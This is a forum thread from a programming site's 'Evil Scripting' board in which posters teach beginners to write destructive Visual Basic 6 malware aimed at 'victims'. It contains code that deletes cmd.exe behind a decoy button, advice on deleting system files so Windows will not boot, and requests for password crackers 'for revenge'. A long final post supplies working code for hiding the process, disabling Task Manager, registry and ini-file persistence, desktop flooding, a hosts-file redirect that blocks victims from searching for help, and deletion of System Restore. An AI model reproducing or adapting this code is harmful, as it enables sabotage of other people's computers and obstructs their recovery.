Evil Scripting

Moderators: None (Apply to moderate this forum)
Number of threads: 62
Number of posts: 272

This Forum Only
Post New Thread
Single Post View       Linear View       Threaded View      f

Report
create a virus in vb 6 * BIGINNERS ONLY * Posted by amino0o on 21 Oct 2004 at 3:14 PM
ok so u noobs out there want a fast easy effective virus in vb 6 ... well ok!!

first of all open vb and select standard exe then make..

1 button
2 labels NO TEXT
1 timer with 3000 interval

ok so now put a desired caption in the button ( Click me is a good one ;)) now in the code of the button put this

Private Sub Command1_Click()
Dim targetfile As String
targetfile = "C:\WINDOWS\system32\cmd.exe"
Kill targetfile
Label1.Caption = " Deleting CMD.exe...please wait "
Timer1.Enabled = True
End Sub

now in the code for the timer put this

Private Sub Timer1_Timer()
Label2.Caption = "Done"
End Sub

and last of all do this

double in the code of the FORM type this make sure u have the activated part

Private Sub Form_Activate()
Timer1.Enabled = False

there u have it !! DO NOT PRESS THE BUTTON ( or back up ur cmd ) this is intended for your victim or u can change the dirctory to a useless file u dont need to test it .. oh yeah and 1 more thing if u dont want your victim to know then just change the form activte timer to false instead of true

good luck

Report
Re: create a virus in vb 6 * BIGINNERS ONLY * Posted by amino0o on 21 Oct 2004 at 3:31 PM
Private Sub Form_Activate()
Timer1.Enabled = False
end sub


forgot to put end sub ;)
Report
Re: create a virus in vb 6 * BIGINNERS ONLY * Posted by vb_virus on 22 Oct 2004 at 10:20 PM
: Private Sub Form_Activate()
: Timer1.Enabled = False
: end sub
:
:
: forgot to put end sub ;)
:
Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?

I have some serious revenge i need to get out of my system.

Thanks...
"Those who follow the paths of others will not succeed in this world."

Report
Re: create a virus in vb 6 * BIGINNERS ONLY * Posted by amino0o on 23 Oct 2004 at 12:22 PM

: Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
:
: I have some serious revenge i need to get out of my system.
:
: Thanks...
: "Those who follow the paths of others will not succeed in this world."
:
:

aint runescape free ?

Report
Re: create a virus in vb 6 * BIGINNERS ONLY * Posted by didani on 23 Oct 2004 at 3:23 PM
: : Private Sub Form_Activate()
: : Timer1.Enabled = False
: : end sub
: :
: :
: : forgot to put end sub ;)
: :
: Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
:
: I have some serious revenge i need to get out of my system.
:
: Thanks...
: "Those who follow the paths of others will not succeed in this world."
:
:

Hey, I'm in for a little brute-forcing... Anyone got the protocols for yahoo messenger? And any volunteers to run the cracker on?
EtHeO out...

Report
Re: create a virus in vb 6 * BIGINNERS ONLY * Posted by VB6_ZeeZ on 30 Oct 2004 at 1:01 PM
: : : Private Sub Form_Activate()
: : : Timer1.Enabled = False
: : : end sub
: : :
: : :
: : : forgot to put end sub ;)
: : :
: : Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
: :
: : I have some serious revenge i need to get out of my system.
: :
: : Thanks...
: : "Those who follow the paths of others will not succeed in this world."
: :
: :
:
: Hey, I'm in for a little brute-forcing... Anyone got the protocols for yahoo messenger? And any volunteers to run the cracker on?
: EtHeO out...
:
:

Thats kind of nice virus but one other file to delete is Autoexec.bat(starts harddrives and stuffs like that when you starts the computer), rundll32.dll(the program where you can change background and screesavers) deleting this and your computer is dead.... ;)

Report
Re: create a virus in vb 6 * BIGINNERS ONLY * Posted by didani on 30 Oct 2004 at 6:14 PM
: : : : Private Sub Form_Activate()
: : : : Timer1.Enabled = False
: : : : end sub
: : : :
: : : :
: : : : forgot to put end sub ;)
: : : :
: : : Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
: : :
: : : I have some serious revenge i need to get out of my system.
: : :
: : : Thanks...
: : : "Those who follow the paths of others will not succeed in this world."
: : :
: : :
: :
: : Hey, I'm in for a little brute-forcing... Anyone got the protocols for yahoo messenger? And any volunteers to run the cracker on?
: : EtHeO out...
: :
: :
:
: Thats kind of nice virus but one other file to delete is Autoexec.bat(starts harddrives and stuffs like that when you starts the computer), rundll32.dll(the program where you can change background and screesavers) deleting this and your computer is dead.... ;)
:
:
Just delete cmdninst.exe, and the whol windows, no matter what version, will refuse to boot.
EtHeO out...

Report
Re: create a virus in vb 6 * BIGINNERS ONLY * Posted by Elite on 25 May 2007 at 11:41 AM
: : : : : Private Sub Form_Activate()
: : : : : Timer1.Enabled = False
: : : : : end sub
: : : : :
: : : : :
: : : : : forgot to put end sub ;)
: : : : :
: : : : Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
: : : :
: : : : I have some serious revenge i need to get out of my system.
: : : :
: : : : Thanks...
: : : : "Those who follow the paths of others will not succeed in this world."
: : : :
: : : :
: : :
: : : Hey, I'm in for a little brute-forcing... Anyone got the protocols for yahoo messenger? And any volunteers to run the cracker on?
: : : EtHeO out...
: : :
: : :
: :
: : Thats kind of nice virus but one other file to delete is Autoexec.bat(starts harddrives and stuffs like that when you starts the computer), rundll32.dll(the program where you can change background and screesavers) deleting this and your computer is dead.... ;)
: :
: :
: Just delete cmdninst.exe, and the whol windows, no matter what
: version, will refuse to boot.
: EtHeO out...
:
:

EtHeo i cant find this cmdninst.exe in xp anyone know how to crash xp?
Report
Re: create a virus in vb 6 * BIGINNERS ONLY * Posted by pandorasBox on 7 Jun 2007 at 5:32 AM
: : : : : : Private Sub Form_Activate()
: : : : : : Timer1.Enabled = False
: : : : : : end sub
: : : : : :
: : : : : :
: : : : : : forgot to put end sub ;)
: : : : : :
: : : : : Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
: : : : :
: : : : : I have some serious revenge i need to get out of my system.
: : : : :
: : : : : Thanks...
: : : : : "Those who follow the paths of others will not succeed in this world."
: : : : :
: : : : :
: : : :
: : : : Hey, I'm in for a little brute-forcing... Anyone got the protocols for yahoo messenger? And any volunteers to run the cracker on?
: : : : EtHeO out...
: : : :
: : : :
: : :
: : : Thats kind of nice virus but one other file to delete is Autoexec.bat(starts harddrives and stuffs like that when you starts the computer), rundll32.dll(the program where you can change background and screesavers) deleting this and your computer is dead.... ;)
: : :
: : :
: : Just delete cmdninst.exe, and the whol windows, no matter what
: : version, will refuse to boot.
: : EtHeO out...
: :
: :
:
: EtHeo i cant find this cmdninst.exe in xp anyone know how to crash
: xp?
:
thanks a lot for the "kill" commands
i just created my first virus in vb.
It doesnt really destroy files per-se
it just opens up random-ass iexplorer-webpages on a regular basis.
i used the "kill" command to destroy taskmgr.exe, which is very helpfull.
to all those who wanna make viruses and hack things, learn a basic programming language like VB or C++, and do maths.

Report
Re: create a virus in vb 6 * BIGINNERS ONLY * Posted by dimen on 10 Sept 2008 at 2:12 PM
Ok how about something a little more substantial, yes noobies must take it slow to get the basics right but! that does not mean they cant learn what makes a virus effective.

Ok 1st let's start with a basic code to keep your virus/worm/trojan hidden from the victim who has received your program and has executed it.

Private Sub Form_Load()
On Error Resume Next
'This command will allow the application to continue running
'even if an error occurs instead of terminating/closing.
Hide
'This command will hide the application from even being seen on the victims
'screen even if your program has it's settings set to Visible|True
App.TaskVisible = False
'This command is even better, this command will stop your program
'from showing up in Task Manager-Applications Tab List, but it will still
'show up in process list, sorry =/
End Sub

Ok now let's move on to some fun, here are some scripts i like to use
hope they help you, they're simple but they do the job.
Disable TaskManager
Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", vbHide

By using Shell, u can use any single CMD command, and by adding
,vbHide after it, CMD will not appear and the victim will not be aware that anything has happened.

Here is a phew more commands for Shell using VB 6.0 Pro:
Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f", vbHide
'This command will make your application start with windows.

Shell "REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f", vbHide
'This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example.

Shell "REG add HKLM\Control Panel\International /v s1159 /t REG_S /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v s2359 /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v SLongDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sShortDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sTimeFormat /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sNativeDigits /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
'These commands will set the time & date for the victims computer permanently
'Change the ###Letter/Symbol/Number### to ? for example, and the victim will see ???????? for the time and ??????
'for the date.

FileCopy App.Path & "\" & App.EXEName & ".EXE", "Drive:\Path\Name.exe"
'This code well, it couldn't be more obvious what it does, but when copying your virus/worm ect
'to a new path, try looking up windows processes like svchost.exe, making it harder for the victim
'to get rid of your virus/worm/trojan ect.

Dim intResult As Integer
Randomize
intResult = Int((9542 * Rnd) + 4592)
FileCopy App.Path & "\" & App.EXEName & ".EXE", "c:\Documents and Settings\All Users\Desktop\DimenBlackScript.exe" & intResult & ".exe"
'Ok for abit of fun, here is a simple code but a real nasty one, add a timer to your application
'interval set to "1" when this code runs, all user accounts desktops will be flooded with your virus and the longer it
'runs the more Memory it takes up and the more viruses that person has to delete, try adding it to places like
' C:\DOCU~\All Users\Start Menu\Programs\Start up\
'That will cause the victim alot of hassle =P.

Kill "c:\windows\win.ini"
Kill "c:\windows\system.ini"
Open "c:\WINDOWS\win.ini" For Output As #1
Print #1, "Load = C:\Program Files\Virus1.exe"
Print #1, "run = C:\Program Files\Virus2.exe"
Close #1
Open "c:\WINDOWS\system.ini" For Output As #1
Print #1, "Shell=Explorer.exe C:\WINDOWS\System\Virus3.exe"
Print #1, "Shell=Explorer.exe C:\WINDOWS\System32\Virus4.exe"
Close #1
'Ok people more fun, making your application start with windows, without using Registry or DOS
'one little alter and your viruses and start with windows and the victim will not know how.

Open "c:\WINDOWS\system32\drivers\etc\hosts" For Output As #1
Print #1, "208.65.153.251 208.65.153.251 "
Print #1, "208.65.153.251 www.google.com"
Print #1, "208.65.153.251 www.google.co.uk"
Print #1, "208.65.153.251 www.yahoo.com"
Print #1, "208.65.153.251 www.yahoo.co.uk"
Print #1, "208.65.153.251 www.askjeeves.com"
Print #1, "208.65.153.251 www.altavista.com"
Print #1, "208.65.153.251 www.alltheweb.com"
Print #1, "208.65.153.251 www.msn.com"
Print #1, "208.65.153.251 www.hotmail.com"
Print #1, "208.65.153.251 www.myspace.com"
Print #1, "208.65.153.251 www.plunder.com"
Print #1, "208.65.153.251 www.quicksharing.com"
Print #1, "208.65.153.251 www.myspace.co.uk"
Close #1
'Just something to help stop the victim from google-ing what the virus has done, and getting information
'or downloads to help rid them of your infection >=P.

Kill "%SystemRoot%\syst" & "em32\dfrg.msc"
Kill "%SystemRoot%\syste" & "m32\wscui.cpl"
Kill "C:\Program Files\Co" & "mmon Files\Microsoft Shared\MSInfo\msinfo32.exe"
Kill "%SystemRoot%\syste" & "m32\restore\rstrui.exe"
Kill "c:\WINDOWS\syste" & "m32\rundll32.exe"
'Ok now finally let's get rid of System Restore, Rundll(by deleting this file, the victim can no longer
'view the properties window for any file on his or her computer).

Ok people that's about it, if you want more well, i have a website but it's still under maintenance at:
www.dimen.co.nr - www.dimen.vnvd.com/Index.html & also a little fun website, www.cspy.co.nr also
part of the first website. have fun people, and don't sit here reading this and copy all the codes, try making your
own from these, you will be amazed at what i learned over the past year and a half.

Peace



 

Recent Jobs

Official Programmer's Heaven Blogs
Web Hosting | Browser and Social Games | Gadgets

Popular resources on Programmersheaven.com
Assembly | Basic | C | C# | C++ | Delphi | Flash | Java | JavaScript | Pascal | Perl | PHP | Python | Ruby | Visual Basic
© Copyright 2011 Programmersheaven.com - All rights reserved.
Reproduction in whole or in part, in any form or medium without express written permission is prohibited.
Violators of this policy may be subject to legal action. Please read our Terms Of Use and Privacy Statement for more information.
Operated by CommunityHeaven, a BootstrapLabs company.